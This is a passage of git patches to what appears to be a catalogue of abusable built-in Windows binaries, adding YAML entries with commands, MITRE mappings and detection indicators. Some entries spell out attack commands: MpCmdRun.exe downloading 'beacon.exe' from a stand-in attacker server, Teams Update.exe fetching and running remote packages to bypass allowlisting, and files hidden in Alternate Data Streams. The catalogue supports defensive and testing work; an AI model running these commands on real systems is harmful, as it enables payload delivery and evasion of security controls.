https://github.com/tamirye + - handle: @tim8288 --- From 4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834 Mon Sep 17 00:00:00 2001 From: Tamirye <34610125+Tamirye@users.noreply.github.com> Date: Sat, 8 Aug 2020 15:09:53 +0300 Subject: [PATCH 57/96] Create diantz.yml use daintz.exe to download and compress a binary file from a remote server\internet or use it to store file in Alternate data stream. --- yml/OSBinaries/diantz.yml | 39 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 yml/OSBinaries/diantz.yml diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/diantz.yml new file mode 100644 index 0000000..a79ecc3 --- /dev/null +++ b/yml/OSBinaries/diantz.yml @@ -0,0 +1,39 @@ + +--- +Name: diantz.exe +Description: Binary that package existing files into a cabinet (.cab) file +Author: Tamir Yehuda +Created: 08/08/2020 +Commands: + - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab + Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. + Usecase: Hide data compressed into an Alternate Data Stream. + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. + - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab + Description: Download and compress a remote file and store it in a cab file on local machine. + Usecase: Download and compress into a cab file. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. +Full_Path: + - Path: c:\windows\system32\diantz.exe + - Path: c:\windows\syswow64\diantz.exe +Code_Sample: + - Code: +Detection: + - IOC: diantz storing data into alternate data streams. + - IOC: diantz getting a file from a remote machine or the internet. +Resources: + - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz +Acknowledgement: + - Person: Tamir Yehuda + Handle: @tim8288 + - Person: Hai Vaknin + Handle: @vakninhai +--- From ed1e113460ccf5f87d2fb083c03a570758e4c7f2 Mon Sep 17 00:00:00 2001 From: Reegun J Date: Mon, 10 Aug 2020 11:31:48 +0800 Subject: [PATCH 58/96] Update update.yml Hi, I have updated with new findings - Reegun --- yml/OtherMSBinaries/update.yml | 42 ++++++++++++++++++++++++++++++---- 1 file changed, 38 insertions(+), 4 deletions(-) diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/update.yml index 44cbd61..5195cf0 100644 --- a/yml/OtherMSBinaries/update.yml +++ b/yml/OtherMSBinaries/update.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update [url to package] + - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -20,7 +20,7 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update [url to package] + - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -28,7 +28,23 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/techniques/T1218/ OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --updateRoolback=[url to package] + - Command: Update.exe --update=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --update=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -52,6 +68,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. + Usecase: Download and execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -70,11 +102,13 @@ Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 + - Link: https://twitter.com/reegun21/status/1291005287034281990 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 + - Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/ Acknowledgement: - - Person: Reegun J (OCBC Bank) + - Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave) Handle: '@reegun21' - Person: Mr.Un1k0d3r Handle: '@MrUn1k0d3r' From eb0279838bcbce541360cd8f576700c3dfcb4c7d Mon Sep 17 00:00:00 2001 From: binar-x79 <45055730+binar-x79@users.noreply.github.com> Date: Wed, 12 Aug 2020 22:04:03 -0700 Subject: [PATCH 59/96] Create pktmon.yml --- yml/OSBinaries/pktmon.yml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 yml/OSBinaries/pktmon.yml diff --git a/yml/OSBinaries/pktmon.yml b/yml/OSBinaries/pktmon.yml new file mode 100644 index 0000000..6eb22f4 --- /dev/null +++ b/yml/OSBinaries/pktmon.yml @@ -0,0 +1,35 @@ +--- +Name: pktmon.exe +Description: Capture Network Packets on the windows 10 with October 2018 Update or later. +Author: Derek Johnson +Created: '2020-08-12' +Commands: + - Command: pktmon.exe start --etw + Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop + Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic + Category: Reconnaissance + Privileges: Administrator + MitreID: T1040 + MitreLink: https://attack.mitre.org/wiki/Technique/T1040 + OperatingSystem: Windows 10 1809 and later +- Command: pktmon.exe filter add -p 445 + Description: Select Desired ports for packet capture + Usecase: Look for interesting traffic such as telent or FTP + Category: Reconnaissance + Privileges: Administrator + MitreID: T1040 + MitreLink: https://attack.mitre.org/wiki/Technique/T1040 + OperatingSystem: Windows 10 1809 and later +Full_Path: + - Path: c:\windows\system32\pktmon.exe + - Path: c:\windows\syswow64\pktmon.exe +Code_Sample: + - Code: http://url.com/git.txt +Detection: + - IOC: .etl files found on system +Resources: + - Link: https://binar-x79.com/windows-10-secret-sniffer/ +Acknowledgement: + - Person: + Handle: +--- From 631996950ab24390e0c5b740a298840b34eb34ee Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:05:16 +0200 Subject: [PATCH 60/96] Update Extrac32.yml --- yml/OSBinaries/Extrac32.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 7b913cb..faa25ea 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -28,7 +28,7 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\*\Desktop\calc.exe + - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe Description: Command for copying calc.exe to another folder Usecase: Copy file Category: Copy From 2dabdb0840dab96ac3b846a400827a56dde5edd0 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:13:16 +0200 Subject: [PATCH 61/96] adjusted extrac32 yml error --- yml/OSBinaries/Extrac32.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index faa25ea..3addec9 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -52,8 +52,8 @@ Acknowledgement: Handle: '@egre55' - Person: Oddvar Moe Handle: '@oddvarmoe' - - Person: Hai Vaknin(Lux) https://github.com/LuxNoBulIshit - - handle: @VakninHai - - Person: Tamir Yehuda https://github.com/tamirye - - handle: @tim8288 + - Person: Hai Vaknin(Lux + Handle: '@VakninHai' + - Person: Tamir Yehuda + Handle: '@tim8288' --- From b592be60270715ec12d7e4cc11e404cd48b7740d Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:17:27 +0200 Subject: [PATCH 62/96] Update Manage-bde.yml Remove extra - --- yml/OSScripts/Manage-bde.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 86024e6..d5a8a4d 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -36,5 +36,5 @@ Acknowledgement: - Person: Daniel Bohannon Handle: '@danielbohannon' - Person: John Lambert - - Handle: '@JohnLaTwC' + Handle: '@JohnLaTwC' --- From 020416d098506c395e7974cd65f0f5fa7e92f79f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:26:35 +0200 Subject: [PATCH 63/96] Delete Update.yml --- yml/OtherMSBinaries/Update.yml | 32 -------------------------------- 1 file changed, 32 deletions(-) delete mode 100644 yml/OtherMSBinaries/Update.yml diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml deleted file mode 100644 index 91c46cc..0000000 --- a/yml/OtherMSBinaries/Update.yml +++ /dev/null @@ -1,32 +0,0 @@ ---- -Name: Update.exe -Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case) -Author: 'Mr.Un1k0d3r' -Created: '2019-06-26' -Commands: - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. - Usecase: Application Whitelisting Bypass - Category: AWL Bypass - Privileges: User - MitreID: T1218 - MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" - Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. - Usecase: Execute binary - Category: Execute - Privileges: User - MitreID: T1218 - MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows 7 and up with Microsoft Teams installed -Full_Path: - - Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe' -Detection: - - IOC: Update.exe spawned an unknown process -Resources: - - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 -Acknowledgement: - - Person: Mr.Un1k0d3r - Handle: '@MrUn1k0d3r' ---- From 39f55359ef916f51156671a642dfe35d5987fb06 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:26:53 +0200 Subject: [PATCH 64/96] Rename update.yml to Update.yml --- yml/OtherMSBinaries/{update.yml => Update.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OtherMSBinaries/{update.yml => Update.yml} (100%) diff --git a/yml/OtherMSBinaries/update.yml b/yml/OtherMSBinaries/Update.yml similarity index 100% rename from yml/OtherMSBinaries/update.yml rename to yml/OtherMSBinaries/Update.yml From 8cf6ef53fb4d392700e67ddfd7991e1f330a62ad Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Sat, 15 Aug 2020 00:27:11 +0200 Subject: [PATCH 65/96] Rename squirrel.yml to Squirrel.yml --- yml/OtherMSBinaries/{squirrel.yml => Squirrel.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OtherMSBinaries/{squirrel.yml => Squirrel.yml} (100%) diff --git a/yml/OtherMSBinaries/squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml similarity index 100% rename from yml/OtherMSBinaries/squirrel.yml rename to yml/OtherMSBinaries/Squirrel.yml From 2cf7d8cdeb5549b23fdc3bc6ce4e34abe7be8cab Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:28:38 +0200 Subject: [PATCH 66/96] Adjusted missing ticks in Acknowledgement --- yml/OSBinaries/Ttdinject.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index b208c85..0acccdd 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -32,7 +32,7 @@ Resources: - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880 Acknowledgement: - Person: Oddvar Moe - Handle: @oddvarmoe + Handle: '@oddvarmoe' - Person: Maxime Nadeau - Handle: @m_nad0 + Handle: '@m_nad0' --- From fa3710ede5569f2191e647475597e996b9058298 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:32:54 +0200 Subject: [PATCH 67/96] Rename certreq.yml to Certreq.yml --- yml/OSBinaries/{certreq.yml => Certreq.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename yml/OSBinaries/{certreq.yml => Certreq.yml} (99%) diff --git a/yml/OSBinaries/certreq.yml b/yml/OSBinaries/Certreq.yml similarity index 99% rename from yml/OSBinaries/certreq.yml rename to yml/OSBinaries/Certreq.yml index b02f001..b9a69bf 100644 --- a/yml/OSBinaries/certreq.yml +++ b/yml/OSBinaries/Certreq.yml @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- \ No newline at end of file +--- From 380b8cfecdd6b120c7018548cc9a5b7861be48e4 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:33:22 +0200 Subject: [PATCH 68/96] Rename ilasm.yml to Ilasm.yml --- yml/OSBinaries/{ilasm.yml => Ilasm.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename yml/OSBinaries/{ilasm.yml => Ilasm.yml} (100%) diff --git a/yml/OSBinaries/ilasm.yml b/yml/OSBinaries/Ilasm.yml similarity index 100% rename from yml/OSBinaries/ilasm.yml rename to yml/OSBinaries/Ilasm.yml From 4792d22ddd49bb066ab1e6b3417161fbcce5a258 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:33:37 +0200 Subject: [PATCH 69/96] Rename vbc.yml to Vbc.yml --- yml/OSBinaries/{vbc.yml => Vbc.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename yml/OSBinaries/{vbc.yml => Vbc.yml} (99%) diff --git a/yml/OSBinaries/vbc.yml b/yml/OSBinaries/Vbc.yml similarity index 99% rename from yml/OSBinaries/vbc.yml rename to yml/OSBinaries/Vbc.yml index 52a479d..4e95905 100644 --- a/yml/OSBinaries/vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -30,4 +30,4 @@ Acknowledgement: Handle: - Person: Hai Vaknin(Lux) Handle: ---- \ No newline at end of file +--- From 57346d17f415ebff1a6172da3e03380e05555f15 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:34:56 +0200 Subject: [PATCH 70/96] Changed capitalization inside file --- yml/OSBinaries/Ttdinject.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 0acccdd..124ea50 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -1,5 +1,5 @@ --- -Name: ttdinject.exe +Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) Author: 'Maxime Nadeau' Created: '2020-05-12' From c5c6820c56ae080ff73cc39c5f708fd78b442af9 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:42:07 +0200 Subject: [PATCH 71/96] Rename agentexecutor.yml to Agentexecutor.yml --- yml/OtherMSBinaries/{agentexecutor.yml => Agentexecutor.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename yml/OtherMSBinaries/{agentexecutor.yml => Agentexecutor.yml} (99%) diff --git a/yml/OtherMSBinaries/agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml similarity index 99% rename from yml/OtherMSBinaries/agentexecutor.yml rename to yml/OtherMSBinaries/Agentexecutor.yml index 79a19d4..6c63788 100644 --- a/yml/OtherMSBinaries/agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -31,4 +31,4 @@ Resources: Acknowledgement: - Person: Eleftherios Panos Handle: @lefterispan ---- \ No newline at end of file +--- From 9b290ba808b27f020a0020bb94f4923731519f22 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:46:09 +0200 Subject: [PATCH 72/96] Update and rename diantz.yml to Diantz.yml --- yml/OSBinaries/{diantz.yml => Diantz.yml} | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) rename yml/OSBinaries/{diantz.yml => Diantz.yml} (95%) diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/Diantz.yml similarity index 95% rename from yml/OSBinaries/diantz.yml rename to yml/OSBinaries/Diantz.yml index a79ecc3..6781774 100644 --- a/yml/OSBinaries/diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -1,6 +1,5 @@ - --- -Name: diantz.exe +Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file Author: Tamir Yehuda Created: 08/08/2020 @@ -33,7 +32,7 @@ Resources: - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz Acknowledgement: - Person: Tamir Yehuda - Handle: @tim8288 + Handle: '@tim8288' - Person: Hai Vaknin - Handle: @vakninhai + Handle: '@vakninhai' --- From 525fc0c1eb2a2299de09802e220eacbbb3909689 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:48:07 +0200 Subject: [PATCH 73/96] Added missing ticks in Diantz --- yml/OSBinaries/Diantz.yml | 4 ++-- yml/OtherMSBinaries/Agentexecutor.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 6781774..46a3c02 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -1,8 +1,8 @@ --- Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file -Author: Tamir Yehuda -Created: 08/08/2020 +Author: 'Tamir Yehuda' +Created: '08/08/2020' Commands: - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 6c63788..23850c1 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -30,5 +30,5 @@ Resources: - Link: Acknowledgement: - Person: Eleftherios Panos - Handle: @lefterispan + Handle: '@lefterispan' --- From 38a3d406b0473c38e4c488822da001db57e50f7f Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Mon, 24 Aug 2020 09:51:48 +0200 Subject: [PATCH 74/96] Update and rename pktmon.yml to Pktmon.yml --- yml/OSBinaries/{pktmon.yml => Pktmon.yml} | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) rename yml/OSBinaries/{pktmon.yml => Pktmon.yml} (88%) diff --git a/yml/OSBinaries/pktmon.yml b/yml/OSBinaries/Pktmon.yml similarity index 88% rename from yml/OSBinaries/pktmon.yml rename to yml/OSBinaries/Pktmon.yml index 6eb22f4..29730a4 100644 --- a/yml/OSBinaries/pktmon.yml +++ b/yml/OSBinaries/Pktmon.yml @@ -1,7 +1,7 @@ --- -Name: pktmon.exe +Name: Pktmon.exe Description: Capture Network Packets on the windows 10 with October 2018 Update or later. -Author: Derek Johnson +Author: 'Derek Johnson' Created: '2020-08-12' Commands: - Command: pktmon.exe start --etw @@ -12,7 +12,7 @@ Commands: MitreID: T1040 MitreLink: https://attack.mitre.org/wiki/Technique/T1040 OperatingSystem: Windows 10 1809 and later -- Command: pktmon.exe filter add -p 445 + - Command: pktmon.exe filter add -p 445 Description: Select Desired ports for packet capture Usecase: Look for interesting traffic such as telent or FTP Category: Reconnaissance @@ -24,12 +24,12 @@ Full_Path: - Path: c:\windows\system32\pktmon.exe - Path: c:\windows\syswow64\pktmon.exe Code_Sample: - - Code: http://url.com/git.txt + - Code: Detection: - IOC: .etl files found on system Resources: - Link: https://binar-x79.com/windows-10-secret-sniffer/ Acknowledgement: - - Person: - Handle: + - Person: Derek Johnson + Handle: '' --- From 9a5e2b114f69ec551acf12f4b504329ad8a5a8e7 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 3 Sep 2020 10:28:49 +0200 Subject: [PATCH 75/96] Fixed the OS versions on Diantz --- yml/OSBinaries/Diantz.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 46a3c02..9c68aa5 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -19,7 +19,7 @@ Commands: Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 - OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. + OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe From bfccb5108547ce0493a2bd2ebe94a31fec2d3d24 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 3 Sep 2020 10:55:37 +0200 Subject: [PATCH 76/96] Added MpCmdRun.exe --- yml/OSBinaries/MpCmdRun.yml | 40 +++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 yml/OSBinaries/MpCmdRun.yml diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml new file mode 100644 index 0000000..8e9ca66 --- /dev/null +++ b/yml/OSBinaries/MpCmdRun.yml @@ -0,0 +1,40 @@ +--- +Name: MpCmdRun.exe +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender +Author: 'Oddvar Moe' +Created: '09/03/2020' +Commands: + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe + Description: Download file to specified path + Usecase: Download file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 + - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe + Description: Download file to machine and store it in Alternate Data Stream + Usecase: Hide downloaded data inton an Alternate Data Stream + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe + - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe + - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe +Code_Sample: + - Code: +Detection: + - IOC: MpCmdRun storing data into alternate data streams. + - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. +Resources: + - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus + - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477 +Acknowledgement: + - Person: Askar + Handle: '@mohammadaskar2' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- From 5c5a218faf33a75fd26ac7632bc6e8e3bfaec26c Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 3 Sep 2020 11:00:56 +0200 Subject: [PATCH 77/96] Updated links on mpcmdrun --- yml/OSBinaries/MpCmdRun.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 8e9ca66..35cc106 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -32,6 +32,7 @@ Detection: Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477 + - Link: https://twitter.com/Oddvarmoe/status/1301444858910052352 Acknowledgement: - Person: Askar Handle: '@mohammadaskar2' From 63c9bc97c3837acb6213a3c1ea682fa97962c4c4 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Thu, 3 Sep 2020 15:29:32 +0200 Subject: [PATCH 78/96] Added detection details on mpcmdrun --- yml/OSBinaries/MpCmdRun.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 35cc106..630d802 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -29,10 +29,13 @@ Code_Sample: Detection: - IOC: MpCmdRun storing data into alternate data streams. - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. + - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477 - Link: https://twitter.com/Oddvarmoe/status/1301444858910052352 + - Link: https://twitter.com/NotMedic/status/1301506813242867720 Acknowledgement: - Person: Askar Handle: '@mohammadaskar2' From 3078cc3755ff80e33a634ad812791ffa0c2dc261 Mon Sep 17 00:00:00 2001 From: Rich Rumble Date: Thu, 3 Sep 2020 10:39:24 -0400 Subject: [PATCH 79/96] Update MpCmdRun.yml Added note that slashes (/) can also be used as command separators, and that the UA is MpCommunication Thanks! --- yml/OSBinaries/MpCmdRun.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 630d802..fa85c4b 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -5,6 +5,7 @@ Author: 'Oddvar Moe' Created: '09/03/2020' Commands: - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe + Note: Slashes work as command line argument seperators /Downloadfile, /url, /path, as well as mixing dash and slash Description: Download file to specified path Usecase: Download file Category: Download @@ -31,6 +32,7 @@ Detection: - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log + - IOC: User Agent is "MpCommunication" Resources: - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477 From 1b00b374b316576c4772f569a4ffad2cec6ca69b Mon Sep 17 00:00:00 2001 From: Rich Rumble Date: Thu, 3 Sep 2020 11:46:25 -0400 Subject: [PATCH 80/96] Updated per suggestion Thanks! --- yml/OSBinaries/MpCmdRun.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index fa85c4b..160c771 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -5,8 +5,7 @@ Author: 'Oddvar Moe' Created: 